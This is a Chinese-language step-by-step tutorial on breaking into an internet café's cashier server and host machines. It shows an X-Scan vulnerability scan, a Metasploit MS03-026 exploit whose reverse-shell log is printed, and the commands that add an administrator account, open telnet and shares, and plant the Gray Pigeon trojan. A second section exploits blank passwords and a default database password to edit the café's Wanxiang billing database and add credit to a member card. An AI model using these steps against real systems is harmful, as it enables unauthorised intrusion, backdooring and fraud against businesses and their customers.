交大家怎么进行入侵网吧收银服务器把(黑鹰)
大家先准备的工具:
                 1.X-Scan-v3.3
  下载地址为:http://dx.3800hk.com/Soft/smgj/7824.html
   3.Metasploit Framework(集合所有漏洞的溢出程序)
      下载地址为:http://dx.3800hk.com/Soft/smgj/13086.html

 
现在网吧向弱口令这样的漏洞很少见了 我们就来完溢出…溢出使用的工具为Metasploit Framework 功能很强大的  包括了最近很流行的ms06-040的漏洞利用程序,有时间大家多研究下 .
  这个是软件安装的位置 
我们第一次安装好还要进行更新下,msfupdate这个是更新程序,由于我开始使用的时候都已经更新好了,所以就没提示更新的文件,大家刚安装好更新他会提示你有多少个更新文件的  大家选yes它就自动更新了..
速度慢的话请大家快进看 ,高手就过把…

首先大家查出收银服务器的ip地址,这个就不用我查了把大家都会把 ,安装好各种软件

 先用x-scan进行扫描漏洞
 本网吧收银的ip 是168.168.168.118,现在在扫描漏洞比较慢,由于时间问题我已经提前扫好

好了现在x-scan扫描完成了  我们看下它的报告

我们先来看下他的445端口能不能溢出,现在很流行的  ..

 

先打开msfweb
我们就利用这个漏洞来溢出把 现在用到的是Metasploit Framework

我们先打开这个程序..然后在浏览器里输入http://127.0.0.1:55555

找到漏洞的利用程序..Microsoft CanonicalizePathName() MSO6-040 Overflow
我们先来这个..大家看我操作..

如果出现这个情况的话证明没有此漏洞了 ,已经被封了  现在我们在来看下其他的漏洞信息..

ok 又有个漏洞了

Microsoft RRPC接口缓冲区溢出漏洞(823980)

远程Windows主机的RPC接口存在缓冲区溢出漏洞。
该漏洞可导致远程攻击者以SYSTEM权限在系统中执行任意代码。

远程攻击者或蠕虫能据此获得主机的控制权。

该漏洞已经引发了至少一个蠕虫:MSBlast。

解决方案:参考 http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

风险等级 : 严重
___________________________________________________________________

The remote host is running a version of Windows which has a flaw in
its RPC interface which may allow an attacker to execute arbitrary code
and gain SYSTEM privileges. There is at least one Worm which is
currently exploiting this vulnerability. Namely, the MsBlaster worm.

Solution: see http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor : High
CVE_ID : CAN-2003-0352
BUGTRAQ_ID : 8205
NESSUS_ID : 11808
Other references : IAVA:2003-A-0011

 

MS03-026我们就用这个来溢出..首先我们来找到它的溢出程序.

大家看我操作

Microsoft RPC DCOM MSO3-026
这个就是了  //

The target address  被溢出的ip 地址168.168.168.118

然后点exploit
[*] Starting Reverse Handler.
[*] Sending request…
[*] Got connection from 168.168.168.93:4321 <-> 168.168.168.118:1341
[*] Shell started on session 4

返回这个结果证明溢出成功我门在来点session4  如果出现的是此页无法显示证明溢出失败..
Microsoft Windows 2000 [Version 5.00.2195]
(C) °?è¨?ùóD 1985-1998 Microsoft Corp.

C:WINNTsystem32>

这个截面大家不会陌生把  呵呵 ..我们先来验证下/
C:WINNTsystem32>
>> ipconfig

ipconfig

Windows 2000 IP Configuration

 

Ethernet adapter ±?μ?á??ó:

 

 Connection-specific DNS Suffix  . :
 IP Address. . . . . . . . . . . . : 168.168.168.118

 Subnet Mask . . . . . . . . . . . : 255.255.255.128

 Default Gateway . . . . . . . . . : 168.168.168.126

C:WINNTsystem32>

现在就是 可以直接创建用户然后提权了…
命令是net user 用户名 密码 /add
提权命令是net localgroup administrators 用户名 /add
然后我们可以在开它的telnet

由于是国外软件可能不是很好支持中文把..

打开telnet后就可以直接用ftp培植木马了  灰鸽子 呵呵…

ok了 现在就来 用灰鸽子了..

昏  出了问题 思路还有很多 呵呵   我们不用ftp一样可以

开他共享 呵呵  我已经开好了这么多了

开共享命令为net share 共享名=目标路径 如net share d$=d:
这样我们就可以直接登陆他的共享盘  然后放木马进去用telnet 运行.

灰鸽子的使用我就不用交了把 呵呵 

我开始使用的时候都中过了现在就让大家看下把 ,..

昏   收银的睡着了…早就看到抱错了的..

到了这就不用我在说什么了把,希望大家不要利用此种方法进行恶意破坏行为..
也希望各网管打好各种补丁.

 

 

 

 

 

需要用的工具:

数据库管理助手
Recton–D贺免杀专用版
NTscan

不罗嗦我们开始
首先用NTscan看我操作
192.168.0.100 就是她了 网吧主机的IP  一般网吧主机都是空口令
用Recton–D贺免杀专用版开她的telnet
Telnet服务已经成功打开!端口:23 . 表示已经打开了
然后打开CMD连接 telnet 192.168.0.100 等下

进去了
 
继续
要想加钱首先的知道他的万象的数据库位置
我们用dir查看他的目录 因为经过我的实验我发现主机上装有还原卡还原C盘所以我确定网管软件应该在别的盘
因为我事先已经找到数据库的位置我就不罗嗦了 怕有的朋友看不懂我还是进去看一下好了Oct2003.mdb这个就是网吧数据库
继续
下一步
把她的万象所在盘做共享我门网吧的安装路径是D盘把他的D做共享
命令格式:net share d=d:
提示成功
我们用数据库管理助手打开万象数据库看我操作 Info TEKSicentOct2003.mdb

添上万象的默认密码chrdwhdhxt
然后找到最后表
用数据库管理助手的搜索功能选第一个填上你的会员卡号 因为我刚刚冲完我就不冲我自己的了给别人冲下把哈哈
这里写你的会员卡号 点搜索 继续看我操作 这个2.2 就是他的钱 用的竟然这么快 我给他改一下
这里写上你想要改的金额 改好以后 打工具蓝哪个对号
然后打上对号
加钱成功了这回你还怕什么
 对了改完以后记得把他的D的共享关了以免你以后没玩的
 好了冲钱到此结束